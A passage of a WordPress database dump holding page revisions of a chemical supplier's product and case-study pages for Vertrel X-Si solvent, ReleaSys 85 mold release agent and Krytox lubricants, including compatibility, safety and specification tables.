style="text-align: center;">Liquid Crystal Polymer</td>\n</tr>\n<tr>\n<td>Polyetherketone, PEK</td>\n<td style="text-align: center;">Phenolic</td>\n</tr>\n<tr>\n<td>Polyaryletherketone, PEEK</td>\n<td style="text-align: center;">PVC, CPVC</td>\n</tr>\n<tr>\n<td>Polysulfone</td>\n<td style="text-align: center;">PTFE, ETFE</td>\n</tr>\n<tr>\n<td>Polyarylsulfone</td>\n<td style="text-align: center;">Cellulosic</td>\n</tr>\n<tr>\n<td>Polyphenylene Sulfide, PPS</td>\n<td></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<table width="456">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="456">Table 4</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2">Elastomer Compatibility</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2">Immersion: 15 Minutes at Room Temperature</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2"><strong>Compatible</strong></td>\n</tr>\n<tr>\n<td>Buna N, NBR, Nitrile</td>\n<td>Buna S, SBR, GRS</td>\n</tr>\n<tr>\n<td>Butyl Rubber, IIR</td>\n<td>Chlorosulfonated PE</td>\n</tr>\n<tr>\n<td>EPM, EPDM, Nordel®</td>\n<td>Polysulfide</td>\n</tr>\n<tr>\n<td>Natural Rubber, Isoprene</td>\n<td>Neoprene</td>\n</tr>\n<tr>\n<td>Polyurethane</td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2">Incompatible</td>\n</tr>\n<tr>\n<td>Viton® B</td>\n<td>Silicone</td>\n</tr>\n</tbody>\n</table>\nData from acute toxicity studies has demonstrated that Vertrel X-Si has low toxicity. Vertrel X-Si is a slight skin and eye irritant and has low acute inhalation toxicity.<strong>Exposure Limit</strong>\n\n<strong>Flammability</strong>\n\nVertrel X-Si exhibits a closed cup flash point per the Pensky-Martens Closed Cup Tester (ASTM D 93) and is classified as a flammable liquid by NFPA or DOT. The product does exhibit vapor flammability limits in air, and has the potential to ignite and burn in an open vessel or in case of a spill, if an ignition source is present. Users should clear equipment of all vapors and liquids before performing any maintenance operations that could result in an ignition source.\n\nFlash point data and limits of flammability in air provide the user with additional information that should be used as elements of a fire risk assessment and to determine guidelines for the safe handling of volatile chemicals. Users should assure compliance with NFPA standards and local fire codes.\n\n<strong>Recovery</strong>\n\nRecovery of Vertrel X-Si is not recommended. The product is not an azeotrope, and composition of the recovered product cannot be assured.\n\nIf recovery is attempted, flammable rated areas and equipment should be used. The presence of soils may further change the characteristics of the material. Any recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel X-Si to ensure proper classification for waste disposal.\n\n<strong>Storage/Handling</strong>\n\nVertrel X-Si is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. If solvent is stored below –10°C (14°F), mix prior to use. Do not allow stored product to exceed 52°C (125°F) to prevent leakage or potential rupture of container from pressure and expansion. Vertrel X-Si is classified as a flammable liquid by DOT/NFPA. It does have flammable limits in air, and has the potential to ignite in an open vessel or in case of a spill, if an ignition source is present. A flammable-rated drum pump is recommended to dispense the product from its container.\n\n<strong>Environmental Legislation</strong>\n\nVertrel specialty fluids have “zero” ozonedepletion potential and low global warming potential (Table 5). They are used as alternatives to CFC-113, methylchloroform, hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\n\nVertrel® X-Si is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozonedepleting substances. Vertrel XF and hexamethyldisiloxane are exempt from classification as volatile organic compounds (VOCs) by the EPA. Vertrel X-Si is also VOC compliant under the California South Coast Air Quality Management District (SCAQMD) regulations, which require VOC content less than 50 g/L of solvent.\n\nThe components of Vertrel X-Si are listed in the TSCA inventory. One component, HFC-43-10mee, is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See MSDS Regulatory Section.\n\nVertrel X-Si is not a hazardous air pollutant (HAP), and therefore not subject to NESHAP regulation. DuPont Vertrel X-Si is not included in the SARA Title III Section 313 list of toxic chemicals, and is not subject to SARA Title III (EPCRA) reporting requirements.\n<table width="456">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="456">Table 5</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2">Environmental Properties</td>\n</tr>\n<tr>\n<td>Property</td>\n<td style="text-align: center;">Vertrel X-Si</td>\n</tr>\n<tr>\n<td>Ozone-Depletion Potential (ODP)</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>Global Warming Potential (GWP/100 yr ITH)*</td>\n<td style="text-align: center;">741</td>\n</tr>\n<tr>\n<td>Volatile Organic Compounds (VOC, g/L)</td>\n<td style="text-align: center;">Exempt</td>\n</tr>\n</tbody>\n</table>\n<strong>Specifications</strong>\n\nComposition and specifications are shown in Table 6. All components are listed in the TSCA Inventory.\n<table width="456">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="2" width="456">Table 6</td>\n</tr>\n<tr>\n<td style="text-align: center;" colspan="2">Vertrel X-Si Specifications</td>\n</tr>\n<tr>\n<td>Vertrel XF, wt%</td>\n<td style="text-align: center;">57.0 ±1.0</td>\n</tr>\n<tr>\n<td>Hexamethyldisiloxane, wt%</td>\n<td style="text-align: center;">43.0 ±1.0</td>\n</tr>\n<tr>\n<td>Nonvolatile Residue, ppm wt</td>\n<td style="text-align: center;">10 max.</td>\n</tr>\n<tr>\n<td>Moisture, ppm wt</td>\n<td style="text-align: center;">200 max.</td>\n</tr>\n<tr>\n<td>Appearance</td>\n<td style="text-align: center;">Clear, Colorless</td>\n</tr>\n</tbody>\n</table>\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">Click here to learn more about Vertrel fluids.</a>', 'Vertrel X-Si', '<p>Vertrel X-Si is ideally suited for use in medical&nbsp;applications as a solvent for cleaning or depositing silicone oil based&nbsp;lubricants. It is also used as a swelling media for silicone&nbsp;rubber tubing.</p>', 'inherit', 'closed', 'closed', '', '2344-autosave-v1', '', '', '2016-10-07 13:09:22', '2016-10-07 13:09:22', '', 2344, 'https://www.miller-stephenson.com/2344-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2351, 3, '2017-06-04 18:08:48', '2017-06-04 18:08:48', '<h2>ReleaSys™ 85 | Rubber Mold Release Agents</h2>\n<h3>Specifically Designed for the Rubber &amp; Elastomer Industry | No transfer and ease of release</h3>\nReleaSys™ 85 is a highly versatile water-based, semi-permanent Rubber Mold Release Agents designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. The aerosolized formula ensures proper application is achieved without the need for spray equipment.  ReleaSys 85 Elastomer / Rubber release agent will not interfere with post-production finishing operation. ReleaSys™ 85 was exceptional designed for operations which require high slip and zero transfer, such as rubber to metal bonding operations  Benefits of this product include:\n<ul>\n 	<li>Exceptional release agent durability</li>\n 	<li>Clean, Non-oily, Non-migrating</li>\n 	<li>Ideal for lower complexity molds</li>\n 	<li>Improves quality and consistency of molded parts</li>\n 	<li>Minimizes mold build-up and fouling</li>\n</ul>\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Semi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent elastomer release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.</span>\n\nBased on our extensive production-floor experience, working shoulder-to-shoulder with our rubber molding customers for decades, Miller-Stephenson is able to understand and differentiate the needs of your process. Factors such as compound type and hardness; production parameters such as molding temperature, molding process, mold shape/construction, rubber to substrate bonding; and post-molding requirements all factor into finding the right product. Hence the development of ReleaSys 85 rubber mold release agents was done to develop a single high-performance solution applicable in the complex industry of rubber and elastomer molding.\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">The application efficiency of ReleaSys can be seen by the relatively small amounts of Rubber Mold Release Agents that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. Products are formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spend years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.</span></p>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a></p>\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></strong>', 'ReleaSys™ 85 | Rubber Mold Release Agents', 'ReleaSys 85 is a highly versatile water-based, semi-permanent mold release agent designed to exhibit superior durability, surface adhesion, and minimization of slip-stick.  Properly applied, our product develops a long lasting thin-film on the mold surface with minimal mold build-up. The aerosolized formula ensures proper application is achieved without the need for spray equipment.  ReleaSys 85 will not interfere with post-production finishing operation.  Benefits of this product include:\n<ul>\n 	<li>Medium Slip; No transfer</li>\n 	<li>Specialized from Rubber/Elastomers</li>\n 	<li>Ideal for lower complexity molds</li>\n 	<li>Improves quality and consistency of molded parts</li>\n 	<li>Minimizes mold build-up and fouling</li>\n</ul>', 'inherit', 'closed', 'closed', '', '419-autosave-v1', '', '', '2017-06-04 18:08:48', '2017-06-04 18:08:48', '', 419, 'https://www.miller-stephenson.com/419-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2352, 2, '2016-10-07 13:17:51', '2016-10-07 13:17:51', '<strong>Krytox AGL 683 Aviation Gear Box Grease - Case Study</strong>\r\n\r\n<strong>Aircraft Cabin Air Conditioning and Temperature Control System Application</strong>\r\n\r\nAircraft systems manufacturer improves flying experience with help from custom lubricant.\r\n\r\n<strong>Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance</strong>\r\n\r\nA systems manufacturer designed a cabin air conditioning and temperature control system for the latest series of large passenger aircraft that makes flying a more comfortable experience for passengers and flight crews. Compared to traditional systems, the new system provides higher humidity, improved air quality, lower cabin pressure, and less noise in the cabin.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe manufacturer needed a lubricant that could meet the demanding requirements of the electromechanical actuator gearbox in the control system. Specifically, the lubricant had to provide superior lubricity over an operating temperature ranging from –55–100 °C (–67–212 °F) and perform with very limited torque. In addition, the gearbox was required to operate for extended periods of time without re-lubrication.\r\n\r\n<strong>The Solution</strong>\r\n\r\nChemours developed a new product specifically designed to meet the needs of the electro-mechanical actuator gearbox. Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque while delivering exceptional lubricity.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox AGL 683 lubricant, the aircraft systems manufacturer was able to extend lubrication intervals.</li>\r\n 	<li>Chemours has the knowledge to put science to work to develop a custom-designed lubricant that met the specific needs of this critical system.</li>\r\n 	<li>Krytox AGL 683 lubricant can be used for other electro-mechanical gearbox applications.</li>\r\n</ul>\r\n[product id="1072"]\r\n\r\nTo learn more about Krytox AGL 683, please <a href="https://www.miller-stephenson.com/product/agl-683/">click here.</a>\r\n\r\n&nbsp;', 'Krytox AGL 683 Case Study - Gearbox Grease', '', 'inherit', 'closed', 'closed', '', '2311-revision-v1', '', '', '2016-10-07 13:17:51', '2016-10-07 13:17:51', '', 2311, 'https://www.miller-stephenson.com/2311-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2353, 2, '2016-10-07 13:22:00', '2016-10-07 13:22:00', '<strong>Krytox Steam Control Valve Lubricant</strong>\r\n\r\n<strong>Krytox grease meets the need for a continuous lubrication cycle.</strong>\r\n\r\n<strong>Steam control valve lubricant application at a geothermal power plant</strong>\r\n\r\nThe power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A standard hydrocarbon-based grease was unsatisfactory for lubricating bushings for valves that control the flow of high temperature steam containing corrosive gases.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe geothermal power plant needed a steam control valve lubricant that:\r\n<ul>\r\n 	<li>Is able to withstand presence of acidic gases in high temperature steam</li>\r\n 	<li>Has low friction for accurate control of the valve position</li>\r\n 	<li>Can work in a self-greasing system</li>\r\n</ul>\r\n<img class="alignnone wp-image-2323" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve-800x331.jpg" alt="steam-control-valve" width="682" height="282" />\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox GPL 206 grease met the challenge for lubrication of the steam valve bushing. It provided the low static friction and no stick-slip that is required for accurate position control. Krytox GPL 206, like all Krytox oils and greases, can withstand very high temperatures, is nonflammable, inert, and has a low environmental footprint. The power plant now enjoys reduced maintenance, thanks to high performance Krytox lubricants—standing up to tough conditions.\r\n\r\n<strong>Other Valve Applications</strong>\r\n<ul>\r\n 	<li>Any valve-handling that could react with, degrade, or dissolve standard lubricants. Examples include:</li>\r\n 	<li>Steam</li>\r\n 	<li>Aggressive/reactive gases</li>\r\n 	<li>Chemicals</li>\r\n</ul>\r\nFluorinated lubricants from Chemours can also be used successfully in other types of applications. These synthetic oils and greases are ideal for many conditions, such as:\r\n<ul>\r\n 	<li>Continuous high temperatures up to 288ºC (550 °F)</li>\r\n 	<li>Use around hazardous chemicals</li>\r\n 	<li>Need for low friction coefficient</li>\r\n 	<li>Where flammability is a concern, including reactive gases and oxygen service</li>\r\n</ul>\r\n[product id="790"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Learn more about the Krytox GPL 206 here.</a>', 'Krytox For Steam Control Valves', '', 'inherit', 'closed', 'closed', '', '2322-revision-v1', '', '', '2016-10-07 13:22:00', '2016-10-07 13:22:00', '', 2322, 'https://www.miller-stephenson.com/2322-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2354, 2, '2016-10-07 13:22:59', '2016-10-07 13:22:59', '<strong>Smooth Operation in Extreme Temperatures and Longer Use-Life Make Krytox™ Valve Lubricants the Choice for Valve Seals</strong>\r\n\r\nControl valves are critical components in plant operations around the world. To optimize operational integrity, valves require proper maintenance. Long-lasting Krytox synthetic lubricants keep valves operating smoothly with less maintenance. Krytox oils and greases can also provide long-term corrosion resistance and enhanced performance, even in harsh environments, as well as extending the wear life of valve seals.\r\nHigh lubricity, perfluoropolyether- (PFPE-) based Krytox performance lubricants are chemically compatible with all seal materials typically used in industrial applications. The remarkable characteristics of Krytox performance lubricants include:\r\n<ul>\r\n 	<li>Compatible with most chemicals used in industrial applications</li>\r\n 	<li>Nontoxic, non-flammable</li>\r\n 	<li>Undamaged by—and non-reactive with—acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n 	<li>Minimal environmental footprint—chemically and biologically inert, and silicone-free</li>\r\n 	<li>Contain no volatile organic compound (VOC) materials or chlorine</li>\r\n</ul>\r\nKrytox lubricants provide smooth valve operation, less re-lubrication, and field-proven performance that can save you time and money. And, they are ideal for demanding conditions—high and low temperatures, extreme pressure, and harsh environments.\r\n\r\n<strong>Examples of Valve Lubricants and Valve-Related Applications</strong>\r\n<ul>\r\n 	<li>An American electricity generating company avoided costly shutdowns due to dried-out grease in its steam turbine governor control valves when they converted to Krytox XHT-BDZ grease; the switch also improved the reliability of supply to the electric grid and enhanced the bottom line.</li>\r\n 	<li>A Korean valve manufacturer was able to reduce damage claims to its pilot-type solenoid valves by applying Krytox GPL 103 oil grade to the solenoid coil in the assembly to reduce friction and heat, and coating the spools and seals with Krytox GPL 223 grease grade to resist degradation from water and oil.</li>\r\n 	<li>A South American manufacturer of big-bore engines used Krytox XP 2C5 grease grade to lubricate its EGR valves. The special additives in Krytox XP 2C5 prevent corrosion and allow free movement of the\r\nmetal-to-metal mechanism; the grease is inert to nitrous oxide gas and withstands temperatures up to 160 ºC (320 ºF).</li>\r\n 	<li>A French airport authority using Krytox XP 2A3 and XP 2A5 grease grades was able to achieve annual savings of €15,000 to 20,000 on the maintenance of its jet fuel pipeline by reducing scheduled maintenance to every 30 months instead of every four to six months—and unscheduled shutdowns due to valve failures were eliminated.</li>\r\n 	<li>A German manufacturer of gear-operated exhaust gas recirculation (EGR) valves for the automotive industry reduced failures due to excessive separation of grease and oil that were occurring at low temperatures and heavy vibrations. Switching to Krytox GPL 216 grease grade, the manufacturer was able to improve the reliability of its EGR valves and estimates that it is saving €80,000 ($100,000+) annually.</li>\r\n 	<li>For a steam control valve application at an Icelandic power plant, standard hydrocarbon-based grease proved unsatisfactory for lubricating bushings for valves that control the flow of high-temperature steam\r\ncontaining corrosive geothermal gases. The optimum lubricant would need to withstand the acidic gases and have low friction for accurate control of the valve position, as well as be capable of performing in a selfgreasing system. Krytox GPL 206 grease met the challenge for lubrication of the steam valve bushing, providing the low static friction and no stick-slip that is required for accurate position control.</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\nTo learn more about Valve Lubricants and Krytox please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>\r\n\r\n&nbsp;', 'Krytox Valve Lubricants', '', 'inherit', 'closed', 'closed', '', '2305-revision-v1', '', '', '2016-10-07 13:22:59', '2016-10-07 13:22:59', '', 2305, 'https://www.miller-stephenson.com/2305-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2355, 2, '2016-10-07 13:25:30', '2016-10-07 13:25:30', '<p><strong>Smooth Operation in Extreme Temperatures and Longer Use-Life Make Krytox™ Valve Lubricants the Choice for Valve Seals</strong></p>\n<p>Control valves are critical components in plant operations around the world. To optimize operational integrity, valves require proper maintenance. Long-lasting Krytox synthetic lubricants keep valves operating smoothly with less maintenance. Krytox oils and greases can also provide long-term corrosion resistance and enhanced performance, even in harsh environments, as well as extending the wear life of valve seals.<br />\nHigh lubricity, perfluoropolyether- (PFPE-) based Krytox performance lubricants are chemically compatible with all seal materials typically used in industrial applications. The remarkable characteristics of Krytox performance lubricants include:</p>\n<ul>\n<li>Compatible with most chemicals used in industrial applications</li>\n<li>Nontoxic, non-flammable</li>\n<li>Undamaged by—and non-reactive with—acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n<li>Minimal environmental footprint—chemically and biologically inert, and silicone-free</li>\n<li>Contain no volatile organic compound (VOC) materials or chlorine</li>\n</ul>\n<p>Krytox lubricants provide smooth valve operation, less re-lubrication, and field-proven performance that can save you time and money. And, they are ideal for demanding conditions—high and low temperatures, extreme pressure, and harsh environments.</p>\n<p><strong>Examples of Valve Lubricants and Valve-Related Applications</strong></p>\n<ul>\n<li>An American electricity generating company avoided costly shutdowns due to dried-out grease in its steam turbine governor control valves when they converted to Krytox XHT-BDZ grease; the switch also improved the reliability of supply to the electric grid and enhanced the bottom line.</li>\n<li>A Korean valve manufacturer was able to reduce damage claims to its pilot-type solenoid valves by applying Krytox GPL 103 oil grade to the solenoid coil in the assembly to reduce friction and heat, and coating the spools and seals with Krytox GPL 223 grease grade to resist degradation from water and oil.</li>\n<li>A South American manufacturer of big-bore engines used Krytox XP 2C5 grease grade to lubricate its EGR valves. The special additives in Krytox XP 2C5 prevent corrosion and allow free movement of the<br />\nmetal-to-metal mechanism; the grease is inert to nitrous oxide gas and withstands temperatures up to 160 ºC (320 ºF).</li>\n<li>A French airport authority using Krytox XP 2A3 and XP 2A5 grease grades was able to achieve annual savings of €15,000 to 20,000 on the maintenance of its jet fuel pipeline by reducing scheduled maintenance to every 30 months instead of every four to six months—and unscheduled shutdowns due to valve failures were eliminated.</li>\n<li>A German manufacturer of gear-operated exhaust gas recirculation (EGR) valves for the automotive industry reduced failures due to excessive separation of grease and oil that were occurring at low temperatures and heavy vibrations. Switching to Krytox GPL 216 grease grade, the manufacturer was able to improve the reliability of its EGR valves and estimates that it is saving €80,000 ($100,000+) annually.</li>\n<li>For a steam control valve application at an Icelandic power plant, standard hydrocarbon-based grease proved unsatisfactory for lubricating bushings for valves that control the flow of high-temperature steam<br />\ncontaining corrosive geothermal gases. The optimum lubricant would need to withstand the acidic gases and have low friction for accurate control of the valve position, as well as be capable of performing in a selfgreasing system. Krytox GPL 206 grease met the challenge for lubrication of the steam valve bushing, providing the low static friction and no stick-slip that is required for accurate position control.</li>\n</ul>\n[ux_product_categories ids="46,34,40,115" number="10"]\n\n<p>To learn more about Valve Lubricants and Krytox please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a></p>\n<p>&nbsp;</p>', 'Krytox Valve Lubricants', '', 'inherit', 'closed', 'closed', '', '2305-revision-v1', '', '', '2016-10-07 13:25:30', '2016-10-07 13:25:30', '', 2305, 'https://www.miller-stephenson.com/2305-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2356, 2, '2016-10-07 13:34:36', '2016-10-07 13:34:36', '<p><strong>Smooth Operation in Extreme Temperatures and Longer Use-Life Make Krytox™ Valve Lubricants the Choice for Valve Seals</strong></p>\n<p>Control valves are critical components in plant operations around the world. To optimize operational integrity, valves require proper maintenance. Long-lasting Krytox synthetic lubricants keep valves operating smoothly with less maintenance. Krytox oils and greases can also provide long-term corrosion resistance and enhanced performance, even in harsh environments, as well as extending the wear life of valve seals.<br />\nHigh lubricity, perfluoropolyether- (PFPE-) based Krytox performance lubricants are chemically compatible with all seal materials typically used in industrial applications. The remarkable characteristics of Krytox performance lubricants include:</p>\n<ul>\n<li>Compatible with most chemicals used in industrial applications</li>\n<li>Nontoxic, non-flammable</li>\n<li>Undamaged by—and non-reactive with—acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n<li>Minimal environmental footprint—chemically and biologically inert, and silicone-free</li>\n<li>Contain no volatile organic compound (VOC) materials or chlorine</li>\n</ul>\n<p>Krytox lubricants provide smooth valve operation, less re-lubrication, and field-proven performance that can save you time and money. And, they are ideal for demanding conditions—high and low temperatures, extreme pressure, and harsh environments.</p>\n<p><strong>Examples of Valve Lubricants and Valve-Related Applications</strong></p>\n<ul>\n<li>An American electricity generating company avoided costly shutdowns due to dried-out grease in its steam turbine governor control valves when they converted to Krytox XHT-BDZ grease; the switch also improved the reliability of supply to the electric grid and enhanced the bottom line.</li>\n<li>A Korean valve manufacturer was able to reduce damage claims to its pilot-type solenoid valves by applying Krytox GPL 103 oil grade to the solenoid coil in the assembly to reduce friction and heat, and coating the spools and seals with Krytox GPL 223 grease grade to resist degradation from water and oil.</li>\n<li>A South American manufacturer of big-bore engines used Krytox XP 2C5 grease grade to lubricate its EGR valves. The special additives in Krytox XP 2C5 prevent corrosion and allow free movement of the<br />\nmetal-to-metal mechanism; the grease is inert to nitrous oxide gas and withstands temperatures up to 160 ºC (320 ºF).</li>\n<li>A French airport authority using Krytox XP 2A3 and XP 2A5 grease grades was able to achieve annual savings of €15,000 to 20,000 on the maintenance of its jet fuel pipeline by reducing scheduled maintenance to every 30 months instead of every four to six months—and unscheduled shutdowns due to valve failures were eliminated.</li>\n<li>A German manufacturer of gear-operated exhaust gas recirculation (EGR) valves for the automotive industry reduced failures due to excessive separation of grease and oil that were occurring at low temperatures and heavy vibrations. Switching to Krytox GPL 216 grease grade, the manufacturer was able to improve the reliability of its EGR valves and estimates that it is saving €80,000 ($100,000+) annually.</li>\n<li>For a steam control valve application at an Icelandic power plant, standard hydrocarbon-based grease proved unsatisfactory for lubricating bushings for valves that control the flow of high-temperature steam<br />\ncontaining corrosive geothermal gases. The optimum lubricant would need to withstand the acidic gases and have low friction for accurate control of the valve position, as well as be capable of performing in a selfgreasing system. Krytox GPL 206 grease met the challenge for lubrication of the steam valve bushing, providing the low static friction and no stick-slip that is required for accurate position control.</li>\n</ul>\n[ux_product_categories ids="46,115,45,86" number="10"]\n\n<p>To learn more about Valve Lubricants and Krytox please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a></p>\n<p>&nbsp;</p>', 'Krytox Valve Lubricants', '', 'inherit', 'closed', 'closed', '', '2305-revision-v1', '', '', '2016-10-07 13:34:36', '2016-10-07 13:34:36', '', 2305, 'https://www.miller-stephenson.com/2305-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2357, 2, '2016-10-07 13:36:19', '2016-10-07 13:36:19', '', 'Krytox GPL Oils', '', 'inherit', 'closed', 'closed', '', 'shutterstock_67406404-2', '', '', '2016-10-07 13:36:43', '2016-10-07 13:36:43', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_67406404.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2358, 2, '2016-10-07 13:38:24', '2016-10-07 13:38:24', '<span style="font-size: 120%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span>\r\n\r\n<strong>Innovations for the Aviation Industry</strong>\r\n\r\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\n<strong>Examples of Aviation-Related Applications</strong>\r\n<ul>\r\n 	<li>Krytox™ 250AD grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\r\n 	<li>Krytox™ 240AC grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\r\n 	<li>Krytox™ greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\r\n 	<li>Krytox™ AGL 683 grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\r\n 	<li>Krytox™ AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\r\n 	<li>Krytox™ 240AC grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and NSF H-1, approved for incidental food contact.</li>\r\n 	<li>Krytox™ 240AC grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\r\n 	<li>Krytox™ lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here. </a>\r\n\r\n&nbsp;', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2016-10-07 13:38:24', '2016-10-07 13:38:24', '', 2302, 'https://www.miller-stephenson.com/2302-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2359, 2, '2016-10-07 13:39:59', '2016-10-07 13:39:59', '<p><span style="font-size: 120%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span></p>\n<p><strong>Innovations for the Aviation Industry</strong></p>\n<p>Since the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.</p>\n<p><strong>Examples of Aviation-Related Applications</strong></p>\n<ul>\n<li>Krytox™ 250AD grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\n<li>Krytox™ 240AC grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\n<li>Krytox™ greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\n<li>Krytox™ AGL 683 grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\n<li>Krytox™ AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\n<li>Krytox™ 240AC grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and NSF H-1, approved for incidental food contact.</li>\n<li>Krytox™ 240AC grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\n<li>Krytox™ lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\n</ul>\n[ux_product_categories ids="86,79" number="10"]\n\n<p><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here. </a></p>\n<p>&nbsp;</p>', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2016-10-07 